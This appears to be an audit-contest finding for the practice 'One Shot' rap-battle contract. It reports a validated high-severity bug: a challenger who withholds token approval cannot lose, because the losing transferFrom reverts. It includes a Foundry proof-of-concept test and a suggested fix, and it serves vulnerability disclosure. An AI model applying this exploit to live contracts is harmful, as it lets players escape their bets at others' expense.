First Flight #10: One Shot

First Flight #10

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Challengers cannot lose if they don't approve token

n0kto

Description

RapBattle::goOnStageOrBattle allows one rapper to be stored in the contract waiting for a battle. The second user calling this function will fight against the rapper on stage. However, only the Credibility token of the first user is transferred to the contract as a prize for the win. Challengers have to approve their token, and transferFrom is used if they lose. A challenger can just not approve any token to be transferred, and they will never lose.

function _battle(uint256 _tokenId, uint256 _credBet) internal {

...

if (random <= defenderRapperSkill) {

// We give them the money the defender deposited, and the challenger's bet

credToken.transfer(_defender, defenderBet);

@> credToken.transferFrom(msg.sender, _defender, _credBet);

}

...

}

Risk

Likelyhood:

Every time a challenger doesn't approve tokens before fighting.

Impact:

Challenger can only win: The function will revert if they lose and pass if they win.

Proof of Concept

Foundry PoC to add in `OneShotTest.t.sol`

function testDefenderCannotWin() public twoSkilledRappers {

// Rapper go on stage

vm.startPrank(user);

oneShot.approve(address(rapBattle), 0);

cred.approve(address(rapBattle), 3);

rapBattle.goOnStageOrBattle(0, 3);

vm.stopPrank();

// Challenger go on battle

vm.startPrank(challenger);

// cred.approve(address(rapBattle), 3);

// Random time where the defender wins

vm.warp(

83398898792747926133958085108077828029129109360118067488968676214425609451240

);

// Reverts: ERC20InsufficientAllowance

rapBattle.goOnStageOrBattle(1, 3);

vm.stopPrank();

}

Recommended Mitigation

As for the defender, transfer token of the challenger before the fight and send totalPrize to the winner.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

missing check for sufficient `_credBet_` approval

Rewards breakdown

nSLOC

201

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.